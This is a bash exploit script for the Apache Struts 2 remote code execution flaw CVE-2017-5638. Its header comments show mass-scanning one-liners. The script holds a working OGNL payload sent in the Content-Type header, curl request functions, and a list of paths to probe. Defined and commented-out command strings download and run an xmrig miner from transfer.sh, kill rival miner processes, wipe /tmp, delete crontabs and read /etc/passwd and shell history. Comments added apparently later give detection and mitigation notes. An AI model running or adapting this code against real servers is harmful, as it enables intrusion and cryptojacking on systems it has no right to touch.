#!/bin/bash
#
# Poc
#
# ./CVE-2017-5638.sh 192.168.9.3
#
# by f0r34chb3t4 - Qui Abr 12 21:00:24 -03 2018
#
# CVE-2017-5638
# Apache Struts 2 remote code execution vulnerability (OGNL expression injected through the Content-Type request header)
# grep -iP 'mod_jk|Servlet|Tomcat|JBoss|Apache-Coyote|JSESSIONID|Jenkins|CJServer|Jetty|GlassFish|Oracle|Payara|JSP/' out.out|awk '{print $2}' > ips3
#https://waf.ninja/struts2-vulnerability-evolution/
#https://github.com/frohoff/ysoserial
#Server: nginx
#Server: Jetty
#Server: Apache-Coyote
#Server: GlassFish
#X-Powered-By: Servlet
#Set-Cookie: JSESSIONID=
#X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
#Server: Oracle-Application-Server-11g
#Server: TWebAP
#Server: nginx
#awk '{print $2,substr($5, 1, length($5)-13)}' out-81.out|sort -u|sort -R| xargs -P2000 -l timeout 60 ./xpl.sh 2>/dev/null
#awk '{print $2,substr($5, 1, length($5)-13)}' out-81.out|sort -u|sort -R| parallel -j256 --delay 1 --colsep ' ' ./xpl.sh {1} {2}
# Positional arguments: $1 = target host (required), $2 = TCP port (default 80).
readonly IPv4="$1"
readonly PORT=${2:-80}
# Exit with status 1 when no host was given.
[ -z "${IPv4}" ] && exit 1
# ${2:-80} already substitutes 80 for an unset or empty $2, so PORT cannot be
# empty at this point and this check never fires.
[ -z "${PORT}" ] && exit 1
# Random start delay of .1s to .4s: $RANDOM % 4 yields 0-3, plus 1, written
# after the dot. $[ ... ] is the old bash arithmetic form; $(( ... )) is the
# current spelling.
sleep .$[ ( $RANDOM % 4 ) + 1 ]s
# Cookie jar handed to curl with -b/-c in rce(). The mktemp variant and the
# cleanup trap are both commented out, so the jar is a fixed file name in the
# current directory: it is never removed, and concurrent runs started from the
# same directory all read and write the same file.
#readonly COOKIE=$( mktemp --dry-run )
readonly COOKIE='xXxXxXxXxXx.dat'
#trap "rm -rf ${COOKIE}" EXIT
#readonly CMD='echo \\win\\n\\n\\n\\n'
#readonly CMD_LNX='echo \\win\\n\\n\\n\\n'
#readonly CMD_WIN='echo \\win\\n\\n\\n\\n'
# In the visible script CMD is referenced only by a commented-out PAYLOAD
# variant, and CMD_LNX / CMD_WIN are not referenced at all; the active PAYLOAD
# uses the literal 'tasklist' and CMD_EXEC instead.
readonly CMD='whoami'
readonly CMD_LNX='whoami'
readonly CMD_WIN='whoami'
#readonly CMD_LNX='ps xf;cd /tmp;ls -lia;curl -s https://transfer.sh/ZSjCf/xmrig > udevd || wget -q -O udevd https://transfer.sh/ZSjCf/xmrig;chmod +x udevd;./udevd;rm -rf udevd;ps xf;exit'
#readonly CMD_WIN='echo \\win\\n\\n\\n\\n'
#readonly CMD='whoami;id;uname -a;hostname;ls -lia;cat /etc/passwd;ps xf;ss -tnp;tail -n100 ~/.bash_history'
#readonly PAYLOAD="%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"${CMD}"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
# curl time limits in seconds. CONNECT_TIMEOUT and MAX_TIME are passed to
# --connect-timeout / --max-time by the request functions; TIMEOUT is not used
# by any curl call visible in this script.
readonly TIMEOUT=5
readonly CONNECT_TIMEOUT=5
readonly MAX_TIME=5
# Fixed desktop-browser User-Agent sent with every request. Defender note: the
# User-Agent is client-controlled, so it is no basis for telling this traffic
# apart from a browser; the Content-Type header is the field to inspect.
readonly USERAGENT='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0'
# Per-run marker: up to 10 characters from the set A-F0-9, read from
# /dev/urandom. check() looks for it in Set-Cookie response headers.
readonly GOOD_KEY=$( head /dev/urandom | tr -dc A-F0-9 | head -c10 )
# OGNL fragment that reads the os.name system property and adds a Set-Cookie
# response header named after GOOD_KEY carrying that value. It is referenced
# only by the commented-out PAYLOAD variant that follows, so the active PAYLOAD
# never produces the cookie check() looks for first.
readonly EXEC='(#os=@java.lang.System@getProperty("os.name")).(#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("Set-Cookie","'${GOOD_KEY}'="+#os))'
#readonly PAYLOAD='%{(#_="multipart/form-data").(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context["com.opensymphony.xwork2.ActionContext.container"]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).'"${EXEC}"'}'
# CMD_KILL, CMD_MISC and CMD_XMRIG are referenced only by the commented-out
# CMD_EXEC variants below; the active CMD_EXEC does not include them.
# Incident-response note: the three strings describe what a host hit by one of
# those variants would show.
#
# CMD_KILL: deletes everything under /tmp and /var/tmp, sends SIGKILL to every
# process whose `ps xf` line matches the pattern list, and removes the current
# user's crontab (crontab -r). The list is an unanchored grep -E regex in which
# "." matches any character, so broad entries such as crond, nmap or /tmp/.
# also match unrelated processes. Many entries are miner-related names (xmrig,
# minexmr, cryptonight, stratum, cpuminer, nicehash).
readonly CMD_KILL='rm -rf /tmp/* /var/tmp/*;ps xf | grep -v grep | grep -E "./nice|./Linux2.6|./atd|./bibi|./usbd|./ddos|config.json|supsplk|nbu.cf|/bin/wipefs|0x4022b1dd|/usr/bin/.sfhd|tcp.ngrok.io|./cmwxd|sleep 3600|minexmr|./LinuxTF|./fdased|./brb|./l6us|./l6us|./xt9527|/usr/bin/.sshd|360.6|./and|./udp12345|./we2dafw|./adwes|./2ew3da1ewa|./542esdew|./llin|./ag|crond|UCM_SIP.exe|./ps|UCM_MS.exe|/tmp/.|logo3.jpg|./mass|sesion.php|lol2.tar.gz|larva.sh|./run.sh|./777dead|/tmp/XMRSH|./ntion|./654|./.conest|./linux|./hpdzsd|oracle.jpg|lol1.tar.gz|hashvault|eeme7j.win|xmrig|nicehash|crawler.weibo|243/44444|cryptonight|stratum|gpg-daemon|jobs.flu.cc|nmap|cranberry|start.sh|watch.sh|krun.sh|killTop.sh|cpuminer|/60009|ssh_deny.sh|clean.sh|./over|mrx1|redisscan|ebscan|redis-cli|barad_agent|.sr0|clay|udevs|/tmp/init|pnscan" | while read pid _; do kill -9 $pid; done;ps xf;crontab -r;exit'
# CMD_MISC: appends two public resolvers to /etc/resolv.conf and sets
# vm.nr_hugepages to 128. Unexpected resolver lines or a changed huge-page
# count on a web server are host-level indicators worth checking.
readonly CMD_MISC='echo "nameserver 8.8.4.4" >> /etc/resolv.conf;echo "nameserver 8.8.8.8" >> /etc/resolv.conf;echo 128 > /proc/sys/vm/nr_hugepages;sysctl -w vm.nr_hugepages=128;exit'
# CMD_XMRIG: fetches a file named xmrig from transfer.sh into /tmp as "udevd",
# runs it and deletes it afterwards. Indicators: a process called udevd started
# from /tmp by the application-server account, and curl/wget requests to
# transfer.sh made by that account.
readonly CMD_XMRIG='cd /tmp;curl -s https://transfer.sh/b3sa7/xmrig > udevd || wget -q -O udevd https://transfer.sh/b3sa7/xmrig;chmod +x udevd;./udevd;rm -rf udevd;exit'
#readonly CMD_EXEC="((${CMD_KILL})2>/dev/null;(${CMD_MISC})2>/dev/null;(${CMD_XMRIG})2>/dev/null) & (ps xf;id;uname -a)"
#readonly CMD_EXEC="((${CMD_XMRIG})2>/dev/null &);uname -a;id;hostname;ps xf;exit"
# Active command string: prints kernel, identity and host name only.
readonly CMD_EXEC='uname -a;id;hostname;exit'
# OGNL expression sent as the Content-Type header value by rce() and put_rce().
# Read left to right it resets OGNL member access, picks cmd.exe /c tasklist
# when os.name contains "win" and /bin/sh -c CMD_EXEC otherwise, starts the
# process and copies its output into the HTTP response.
# Detection: a Content-Type request header that starts with %{ or contains
# ognl.OgnlContext, #_memberAccess or java.lang.ProcessBuilder is never a
# legitimate media type and can be rejected at a proxy or WAF.
# Mitigation: run a Struts release in which this CVE is fixed (see the Apache
# Struts security bulletin for CVE-2017-5638).
readonly PAYLOAD="%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='tasklist').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c','"${CMD_EXEC}"'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
#sudo -u bebete
# hrce URL
# Sends a HEAD request (-I) to URL without the payload header and prints what
# curl returns: response headers (-i), the verbose trace (-v), no progress
# meter (-s). Follows up to 5 redirects and skips TLS certificate verification
# (--insecure). Reads the globals CONNECT_TIMEOUT, MAX_TIME and USERAGENT.
# In the visible script it is called only from commented-out code.
function hrce(){
  local target="$1"
  # The two timeout values stay unquoted, exactly as in a plain command line.
  local -a probe_opts=(
    --tcp-nodelay
    --globoff
    -H 'Accept-Encoding: identity'
    --location
    --max-redirs 5
    -ivIs
    --insecure
    --connect-timeout ${CONNECT_TIMEOUT}
    --max-time ${MAX_TIME}
    --user-agent "${USERAGENT}"
    --url "${target}"
  )
  curl "${probe_opts[@]}"
}
#sudo -u bebete
# rce URL
# Issues one curl request to URL with ${PAYLOAD} (an OGNL expression) as the
# Content-Type header value and prints curl's output: response headers and body
# (-i), the verbose trace (-v), no progress meter (-s).
# Cookies are read from and stored in the ${COOKIE} file, --insecure turns off
# TLS certificate verification, and up to 5 redirects are followed.
# ${COOKIE}, ${CONNECT_TIMEOUT} and ${MAX_TIME} are expanded unquoted.
# Detection: the request line and User-Agent look like ordinary browser
# traffic; the anomaly is confined to the Content-Type header, so request
# logging that omits that header will not show it.
function rce(){
local url="$1"
curl --tcp-nodelay --globoff -H 'Accept-Encoding: identity' --location --max-redirs 5 -ivs -b ${COOKIE} -c ${COOKIE} --insecure --connect-timeout ${CONNECT_TIMEOUT} --max-time ${MAX_TIME} --user-agent "${USERAGENT}" -H 'Content-Type: '"${PAYLOAD}" --url "${url}"
}
# put_rce URL
# Variant of rce() that uses the PUT method over HTTP/1.0 (-0) with an empty
# body (Content-Length: 0) and ${PAYLOAD} as the Content-Type header value.
# A random 32-character JSESSIONID (characters A-F0-9 from /dev/urandom) is
# sent as a Cookie header; the ${COOKIE} jar file is not used here.
# Follows up to 3 redirects; unlike rce() it does not pass --insecure.
# Detection: a PUT with Content-Length: 0 whose Content-Type carries an OGNL
# expression; the Accept and Accept-Language headers imitate a browser.
# In the visible script the only call site comes after an unconditional
# `exit 0`, so this function is never reached.
function put_rce(){
local url="$1"
local JSESSIONID=$( head /dev/urandom | tr -dc A-F0-9 | head -c32 )
curl -svi -X PUT -0 \
--location --max-redirs 3 \
-H 'Content-Type: '"${PAYLOAD}" \
-H 'Connection: close' \
-H 'Content-Length: 0' \
-H "Cookie: JSESSIONID=${JSESSIONID}" \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \
-H 'Accept-Language: en-US,en;q=0.5' \
-H 'Accept-Encoding: identity' \
--connect-timeout ${CONNECT_TIMEOUT} \
--max-time ${MAX_TIME} \
--user-agent "${USERAGENT}" \
--url "${url}"
}
# check URL RESPONSE
# Classifies a captured HTTP response and terminates the script on a verdict:
#   - a Set-Cookie header line containing ${GOOD_KEY}: logs URL and the text
#     after the first "=" to vul-os.dat, exit 0
#   - the literal text winnnnn in the response: logs to vul-lnx.dat, exit 0
#   - the literal text \win\n\n\n\n in the response: logs to vul-win.dat, exit 0
#   - no "HTTP/1." anywhere in the response: exit 1
# Otherwise it returns 0 and the caller continues.
# Every log line is also echoed to stdout (tee -a appends to the file).
function check(){
  local target="$1"
  local response="$2"
  local reported_os

  # Carriage returns are stripped so the extracted value has no trailing \r.
  reported_os=$(
    grep -F 'Set-Cookie:' <<< "${response}" \
      | tr -d $'\r' \
      | grep -F "${GOOD_KEY}" \
      | cut -d '=' -f2- \
      | head -n1
  )

  if [[ -n "${reported_os}" ]]; then
    printf '[+] vul: %s os: %s\n' "${target}" "${reported_os}" | tee -a vul-os.dat
    exit 0
  elif grep -qF 'winnnnn' <<< "${response}"; then
    printf '[+] vul lnx: %s\n\n%s\n\n' "${target}" "${response}" | tee -a vul-lnx.dat
    exit 0
  elif grep -qF '\win\n\n\n\n' <<< "${response}"; then
    printf '[+] vul win: %s\n\n%s\n\n' "${target}" "${response}" | tee -a vul-win.dat
    exit 0
  elif ! grep -qF 'HTTP/1.' <<< "${response}"; then
    exit 1
  fi
}
################################################################################
# path list
#
# Candidate URL paths, one per line, stored in PATH_LIST.
# `read -d '\n'` uses the first character of the two-character string \n, a
# backslash, as its delimiter. The list contains no backslash, so read stores
# the whole here-document in PATH_LIST and returns non-zero at end of input.
# The only consumer is the `for XPATH in ${PATH_LIST}` loop near the end of the
# script, which sits after an unconditional `exit 0`.
# Detection: one client requesting many of these paths in quick succession,
# each with an OGNL expression in the Content-Type header, is a scan signature.
################################################################################
read -d '\n' -r PATH_LIST <<-'TXT'
/index.do
/public/
/login
/login.html
/iframe/index!index.action
/index.action
/user/login.action
/LoginForm
/main.html
/system/Login.do
/bbs/bbs/view.act
/help.action
/userlogin!doDefault.action
/default.action
/login.action
/admin.action
/auth/start
/Pages/login?domain_login=true
/admin/index.do
/ipmsLogin.jsp
/dhis-web-commons/security/login.action
/security/login.hlt
/security/
/Default.action
/login.do
/index!index.action
/site/index.action
/showNews.action
/app/login.action
/app/
/WebApp/
/pages/common/sessonExceptionPage.jsp
/pages/
/common/
/ezon/
/bamboo/about.action
/bamboo/
/viewAdministrators.action
/content!mail.action
/base.action?page=login
/eDocs-Accounts/
/user/main-1.html
/edms/index.do
/login.jsp
/invoice-homepage/
/login/
/admin/
/web/loginPage.do2
/web/
/vas/
/Index_showIndex.do
/userLogin.action
/index2.jsp
/orders.xhtml
/struts2-showcase/index.action
/login-before.xhtml
/account/login.jsp
/service/
/admin/timeout.jsp
/Secure/
/portal/
/upload/
/themes/
/content/
/var/
/cache/
/welcome
/anonymous/login.xhtml
/Tomcat
/JBoss
/common/index/style/login/loginJY.jsp
/index?first=true
/cms/login
/cms/
/login_authLogin.action
/error/errorEvents.action
/j_spring_security_check
/login.action?login_error=1
/Login!start.action
TXT
# Main flow. As written, the script sends a single rce() request to the root
# path of the target, prints curl's output and exits 0. Every statement after
# that first `exit 0` is unreachable.
#
# Disabled pre-check: HEAD request plus a grep for Java application-server
# banners in the response.
#res="$( hrce "http://${IPv4}:${PORT}/" )"
#if ! grep -qiP 'mod_jk|nginx|Servlet|Tomcat|JBoss|Apache-Coyote|JSESSIONID|Jenkins|CJServer|Jetty|GlassFish|Oracle|Payara|JSP/' <<< "${res}";then
# printf '[+] init: %s\n' "http://${IPv4}:${PORT}"
#else
# printf '[-] exit: %s\n' "http://${IPv4}:${PORT}"
# exit 1
#fi
#check "http://${IPv4}:${PORT}/" "$( rce "http://${IPv4}:${PORT}/" )"
#echo "${CMD_EXEC}"
#exit 0
# The only request that is actually sent; its output is not passed to check().
rce "http://${IPv4}:${PORT}/"
#echo "${PAYLOAD}"
exit 0
# Unreachable: PUT variant against /Hello.World. A response containing
# `id`-style output (uid=<digits>(<name>)) is logged to vul.dat.
res="$( put_rce "http://${IPv4}:${PORT}/Hello.World" )"
if grep -qP 'uid=[0-9]{1,5}\(.+?\)' <<< "${res}"; then
printf '[+] vul: %s\n' "http://${IPv4}:${PORT}" | tee -a vul.dat
printf '%s\n\n' "${res}"
fi
exit 0
# Unreachable: one rce() request per PATH_LIST entry, each response handed to
# check(). ${PATH_LIST} is unquoted so that it splits on whitespace.
for XPATH in ${PATH_LIST};do
check "http://${IPv4}:${PORT}${XPATH}" "$( rce "http://${IPv4}:${PORT}${XPATH}" )"
done
#if grep -qP 'uid=[0-9]{1,5}\(.+?\)' <<< "${res}"; then
# printf '[+] vul: %s\n' ${IPv4}
# printf '\n\n%s\n\n' "${res}"
#fi
#check "https://${IPv4}" "$( rce "https://${IPv4}" )"
#check "${IPv4}:8080" "$( rce "${IPv4}:8080" )"
exit 0